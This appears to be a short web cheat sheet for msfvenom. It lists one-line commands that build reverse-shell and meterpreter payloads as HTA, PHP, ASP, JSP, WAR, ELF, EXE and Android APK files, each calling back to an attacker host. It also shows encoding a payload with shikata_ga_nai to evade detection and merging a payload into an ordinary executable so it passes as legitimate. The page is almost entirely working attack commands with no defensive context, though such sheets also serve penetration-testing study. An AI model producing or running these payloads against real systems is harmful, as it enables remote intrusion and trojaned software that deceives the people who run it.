Skip to main content

Msfvenom

msfvenom help

list payloads

msfvenom -l payloads

list formats

msfvenom -l formats

list encoders

msfvenom -l encoders

msfvenom Shells

hta-psh msfvenom

Returns a cmd.exe prompt

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.1.2 LPORT=9005  -f hta-psh -o evil.hta

php msfvenom

msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<port> -f raw -o revshell.php 

asp msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f asp -o revshell.asp 

jsp msfvenom

msfvenom -p java/jsp_revshell_reverse_tcp LHOST=<IP> LPORT=<port> -f raw -o revshell.jsp

war msfvenom

msfvenom -p java/jsp_revshell_reverse_tcp LHOST=<IP> LPORT=<port> -f war -o revshell.war 

linux elf msfvenom

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f elf -o revshell.elf 

exe encoded msfvenom

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -e x86/shikata_ga_nai -b ‘\x00’ -i 5 -f exe -o revshell.exe

merge exe with payload msfvenom

 msfvenom -x normal.exe -k -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe

android msfvenom

msfvenom -p android/meterpreter/reverse/tcp LHOST=<IP> LPORT=<port> R -o revshell.apk